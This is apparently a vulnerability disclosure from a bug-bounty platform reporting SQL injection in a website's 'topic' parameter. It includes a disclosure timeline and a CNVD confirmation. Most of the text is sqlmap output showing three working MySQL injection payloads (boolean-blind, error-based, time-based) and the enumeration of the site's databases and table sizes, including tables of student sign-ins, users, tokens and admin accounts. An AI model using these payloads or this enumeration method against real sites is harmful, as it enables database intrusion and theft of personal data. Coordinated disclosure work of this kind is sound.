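2016-01-05: Details reported to the vendor; awaiting vendor handling
2016-01-08: Vendor has confirmed; details disclosed to the vendor only
2016-01-18: Details disclosed to core white hats and experts in related fields
2016-01-28: Details disclosed to regular white hats
2016-02-07: Details disclosed to intern white hats
2016-02-20: Details disclosed to the public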
As the title says.
http://**.**.**.**/index/list?topic=0&sortid=13
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: topic (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: topic=0 RLIKE (SELECT (CASE WHEN (3524=3524) THEN 0 ELSE 0x28 END))&sortid=13

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: topic=0 AND (SELECT 4243 FROM(SELECT COUNT(*),CONCAT(0x716a6a6271,(SELECT (ELT(4243=4243,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sortid=13

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: topic=0 AND (SELECT * FROM (SELECT(SLEEP(5)))GWIX)&sortid=13
---
[12:52:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.12, PHP 5.4.13, Nginx
back-end DBMS: MySQL 5.0
[12:52:16] [INFO] fetching database names
[12:52:16] [INFO] the SQL query used returns 12 entries
[12:52:16] [INFO] resumed: information_schema
[12:52:16] [INFO] resumed: ankang_bbs
[12:52:16] [INFO] resumed: ankang_cms
[12:52:16] [INFO] resumed: ankang_ucent
[12:52:16] [INFO] resumed: app_jbw
[12:52:16] [INFO] resumed: kim_appadmin
[12:52:16] [INFO] resumed: kim_appcms
[12:52:16] [INFO] resumed: mysql
[12:52:16] [INFO] resumed: openfire
[12:52:16] [INFO] resumed: performance_schema
[12:52:16] [INFO] resumed: platform
[12:52:16] [INFO] resumed: test
available databases [12]:
[*] ankang_bbs
[*] ankang_cms
[*] ankang_ucent
[*] app_jbw
[*] information_schema
[*] kim_appadmin
[*] kim_appcms
[*] mysql
[*] openfire
[*] performance_schema
[*] platform
[*] test
Database: test
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| pro_security_student_signin | 600086  |
| pro_security_define         | 38408   |
| pro_security_class_signin   | 30197   |
| task_log                    | 21320   |
| pro_security_laws           | 14378   |
| pro_security_class_check    | 12642   |
| food_col                    | 6583    |
| pro_security_roles          | 5079    |
| pro_security_student        | 4105    |
| actionlog                   | 4095    |
| china                       | 3331    |
| pro_security_ohs            | 3219    |
| user_bs                     | 2835    |
| pro_security_role_user      | 1117    |
| food_main                   | 849     |
| pro_security_user           | 691     |
| app_organization            | 531     |
| app_tokens                  | 368     |
| app_db_config               | 354     |
| app_setup_log               | 344     |
| app_repos                   | 309     |
| task                        | 299     |
| deploy_rj                   | 182     |
| pro_security_accidentevent  | 145     |
| user_limit                  | 65      |
| pro_security_define_type    | 30      |
| message                     | 26      |
| `user`                      | 17      |
| app_info                    | 17      |
| app_infos                   | 15      |
| app_match_rules             | 15      |
| expired_rules               | 15      |
| customer_appid              | 13      |
| product_cate                | 6       |
| cloud_token                 | 3       |
| customer                    | 3       |
| admin                       | 2       |
| config                      | 2       |
| product                     | 2       |
| product_versions            | 2       |
| app_info_field              | 1       |
| bug66124                    | 1       |
| roles                       | 1       |
| site                        | 1       |
| user_old                    | 1       |
+-----------------------------+---------+

Database: kim_appadmin
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| sign            | 358942  |
| log             | 37669   |
| message         | 13827   |
| dietarytmp      | 11667   |
| messagelist     | 9545    |
| `user`          | 5185    |
| userinfo        | 5185    |
| role            | 4603    |
| sms             | 524     |
| class           | 523     |
| area            | 432     |
| weather         | 207     |
| school          | 174     |
| messageconfirm  | 111     |
| push_rel        | 30      |
| remindlist      | 13      |
| finance         | 6       |
| addressbooktype | 2       |
| feedback        | 1       |
+-----------------+---------+
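Severity: High
Vulnerability Rank: 10
Confirmed: 2016-01-08 20:06
CNVD has confirmed the situation described and has passed it to CNCERT for forwarding to the Beijing sub-center, which will coordinate follow-up handling with the organization that manages the website.
None at this time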